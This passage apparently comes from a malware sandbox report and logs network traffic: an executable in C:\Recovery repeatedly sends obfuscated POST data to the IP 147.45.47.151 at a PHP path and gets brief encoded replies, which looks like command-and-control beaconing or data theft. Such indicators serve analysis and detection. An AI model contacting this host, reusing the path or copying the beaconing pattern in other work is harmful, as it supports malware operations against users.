                                                                                          Dec 10, 2024 07:28:31.389014959 CET9888OUTData Raw: 31 5a 49 73 4b 4d 64 61 2f 54 4b 58 7a 4a 36 50 76 63 73 66 4d 64 76 58 43 4b 2b 64 31 4f 44 54 74 6d 38 32 32 66 64 67 7a 6b 64 70 67 6f 38 34 34 6c 33 4b 72 33 32 39 6d 49 4e 5a 6d 33 63 38 46 75 53 6a 66 4a 2b 55 71 36 5a 63 4e 72 36 41 74 66
                                                                                          Data Ascii: 1ZIsKMda/TKXzJ6PvcsfMdvXCK+d1ODTtm822fdgzkdpgo844l3Kr329mINZm3c8FuSjfJ+Uq6ZcNr6AtfEpKMMweV0OsVkbdtjFVchSUOoOlqs8x/SsPY9obQgUrbLpETV95kC9SqbC0fFCGV2jVnyTqy3ECSjSbf+qFXpXoUieYf6UdEj/wRf+4Rf8VuUpKpmhujzt3YDdvdaXsG4nmlc76O8ewUvkjL69goemcls6NEgpbXO
                                                                                          Dec 10, 2024 07:28:31.389216900 CET9888OUTData Raw: 31 72 6c 4d 64 6d 77 2f 6d 52 65 71 67 69 68 64 30 52 5a 75 61 70 57 6c 55 5a 4c 6c 63 59 72 70 63 7a 4c 57 69 6e 6f 37 77 57 6d 42 39 43 74 55 31 58 74 50 4c 2f 48 59 5a 39 58 57 44 36 58 55 30 62 54 4b 30 79 6f 2f 71 58 37 74 64 56 37 4d 72 34
                                                                                          Data Ascii: 1rlMdmw/mReqgihd0RZuapWlUZLlcYrpczLWino7wWmB9CtU1XtPL/HYZ9XWD6XU0bTK0yo/qX7tdV7Mr44fFu+yhtY/BSg9kUuvCGSntv1uO8OrZLZay5jBTyYU680YYWCT+aTCpw/aqZ+0anTzJlY/WUo8v4Z8RWfoIkpT7UYts3n5lwd3fHYfinGmvhrkq4RQSPC+chjSk7CARRCccAVYbpe/iUdMNxfYi54hV37wCTuTOn8
                                                                                          Dec 10, 2024 07:28:32.087762117 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:31 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          14192.168.2.849729147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:31.051948071 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:31.581491947 CET2512OUTData Raw: 52 5c 5a 5d 5e 5a 55 58 58 57 5a 57 52 54 51 51 5b 5f 5d 47 57 53 50 54 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R\Z]^ZUXXWZWRTQQ[_]GWSPT^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"275!&%=.,$?4Y398V6!Z<+$R=8=_#T'\9.\%!Z+
                                                                                          Dec 10, 2024 07:28:32.303925991 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:32.537039995 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:32 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          15192.168.2.849730147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:32.786464930 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2504
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:33.132388115 CET2504OUTData Raw: 57 5b 5a 59 5e 55 55 5e 58 57 5a 57 52 55 51 50 5b 5a 5d 42 57 50 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W[ZY^UU^XWZWRUQP[Z]BWPPX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!&/#:5!6)7'Y(]$*U5>2<8Q="4"0-).\%!Z+4
                                                                                          Dec 10, 2024 07:28:34.053833961 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:34.285051107 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:33 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          16192.168.2.849731147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:35.593307972 CET344OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:35.946928978 CET2512OUTData Raw: 52 5d 5a 5d 5e 58 55 58 58 57 5a 57 52 57 51 52 5b 5b 5d 43 57 56 50 59 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R]Z]^XUXXWZWRWQR[[]CWVPY^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"_2/,]!:""%*>$<'0:+ .<3++^#";..\%!Z+,
                                                                                          Dec 10, 2024 07:28:36.855150938 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:37.089068890 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:36 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          17192.168.2.849732147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:35.593776941 CET344OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 1984
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:35.944762945 CET1984OUTData Raw: 57 5a 5f 52 5e 58 50 5a 58 57 5a 57 52 5c 51 5c 5b 59 5d 47 57 55 50 5b 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WZ_R^XPZXWZWR\Q\[Y]GWUP[^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!1<? :)6&5_)=+]';%*!-9(P+;)[ !8:).\%!Z+
                                                                                          Dec 10, 2024 07:28:36.855185032 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:37.088996887 CET349INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:36 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 25 59 23 5f 37 11 25 23 30 55 38 08 3b 51 26 3e 23 45 2a 54 3a 5c 25 16 27 19 3a 0c 09 1c 2a 03 04 03 3c 2a 0a 57 29 11 0e 0c 30 0f 21 46 0c 1d 27 04 26 2b 21 01 24 04 33 5d 24 06 23 10 33 21 20 01 29 0a 3b 0c 34 0d 27 5f 27 33 3b 0c 3b 3d 29 0d 2f 36 22 45 2b 21 2e 1f 25 38 22 57 0d 12 27 51 24 30 2a 07 23 32 3a 1c 21 22 3f 0f 2b 26 3b 04 27 58 27 12 21 3a 35 11 33 0f 28 1d 20 37 3c 5e 2b 15 3a 5c 31 04 26 1b 33 2b 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98%Y#_7%#0U8;Q&>#E*T:\%':*<*W)0!F'&+!$3]$#3! );4'_'3;;=)/6"E+!.%8"W'Q$0*#2:!"?+&;'X'!:53( 7<^+:\1&3+ ^*+U?WT0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          18192.168.2.849733147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:37.427737951 CET344OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:37.772810936 CET2512OUTData Raw: 57 5c 5a 59 5e 5e 55 5b 58 57 5a 57 52 5d 51 51 5b 5a 5d 48 57 50 50 5c 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W\ZY^^U[XWZWR]QQ[Z]HWPP\^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!'/( :>59*>/0,+3;!=!](;*5 ?[.9.\%!Z+
                                                                                          Dec 10, 2024 07:28:38.685293913 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:38.920800924 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:38 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          19192.168.2.849734147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:39.202027082 CET344OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:39.642179966 CET2512OUTData Raw: 57 58 5a 5f 5b 5b 55 58 58 57 5a 57 52 57 51 5c 5b 5d 5d 40 57 5e 50 55 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WXZ_[[UXXWZWRWQ\[]]@W^PU^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"_1 !:>!%%>3$?$\?5=1Z(++;&#+\-).\%!Z+,
                                                                                          Dec 10, 2024 07:28:40.463282108 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:40.701029062 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:40 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          20192.168.2.849736147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:40.946151972 CET344OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:41.310215950 CET2512OUTData Raw: 52 59 5f 5a 5e 5b 55 59 58 57 5a 57 52 5d 51 5d 5b 5e 5d 46 57 52 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: RY_Z^[UYXWZWR]Q][^]FWRPX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!%74."5**.#'? 38!.9+ S>8%#49.\%!Z+
                                                                                          Dec 10, 2024 07:28:42.198590040 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:42.432786942 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:42 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          21192.168.2.849737147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:42.928108931 CET344OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 1992
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:43.272787094 CET1992OUTData Raw: 57 5c 5f 53 5b 5e 55 5f 58 57 5a 57 52 55 51 5d 5b 50 5d 45 57 54 50 59 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W\_S[^U_XWZWRUQ][P]EWTPY^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"[1([#>#%%_)>3<]$<6%X?^0=*#2-.\%!Z+
                                                                                          Dec 10, 2024 07:28:44.153390884 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:44.389072895 CET349INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:44 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 25 5b 37 2a 2b 5c 32 0d 0e 55 2f 57 33 56 25 13 02 18 2b 32 07 01 32 2b 27 5e 39 0b 3f 57 3e 3d 03 5b 28 3a 28 1f 2a 3c 2b 52 24 35 21 46 0c 1d 27 00 33 02 35 05 24 2d 20 01 30 3f 24 07 33 0c 19 15 2b 23 28 55 37 0d 2f 5c 27 33 3c 54 2c 13 29 0f 2c 26 3d 1b 29 21 3d 0c 32 28 22 57 0d 12 27 1b 32 1e 2d 5b 20 21 3e 55 22 21 34 57 2b 26 38 10 33 3e 3c 02 22 29 21 5a 27 31 3c 5e 22 27 24 13 3f 5d 31 02 32 3d 07 0e 26 2b 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98%[7*+\2U/W3V%+22+'^9?W>=[(:(*<+R$5!F'35$- 0?$3+#(U7/\'3<T,),&=)!=2("W'2-[ !>U"!4W+&83><")!Z'1<^"'$?]12=&+ ^*+U?WT0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          22192.168.2.849738147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:42.990257978 CET344OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:43.335202932 CET2512OUTData Raw: 52 5c 5a 5e 5e 5b 55 58 58 57 5a 57 52 5d 51 52 5b 58 5d 44 57 57 50 59 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R\Z^^[UXXWZWR]QR[X]DWWPY^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!% ^#*&Q!6)X='$$X'\8T".%X)8?>(!#!;\:9.\%!Z+
                                                                                          Dec 10, 2024 07:28:44.244064093 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:44.481054068 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:44 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          23192.168.2.849739147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:44.735332012 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:45.134495974 CET2512OUTData Raw: 57 59 5f 5b 5b 5f 55 5b 58 57 5a 57 52 56 51 54 5b 5b 5d 42 57 50 50 5b 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WY_[[_U[XWZWRVQT[[]BWPP[^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!&<,]7\*P#%9_*. ',4Y3:<!=2+;0+;=Y!"4-.\%!Z+(
                                                                                          Dec 10, 2024 07:28:46.002932072 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:46.237037897 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:45 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          24192.168.2.849740147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:46.486129045 CET344OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:46.837968111 CET2512OUTData Raw: 52 5b 5f 59 5e 58 55 50 58 57 5a 57 52 53 51 52 5b 5e 5d 40 57 56 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R[_Y^XUPXWZWRSQR[^]@WVPX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"['?<[7*U!P&=-33< ]$*5-)8(W*;^!2'9.\%!Z+<
                                                                                          Dec 10, 2024 07:28:47.757304907 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:47.980964899 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:47 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          25192.168.2.849741147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:48.655504942 CET344OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
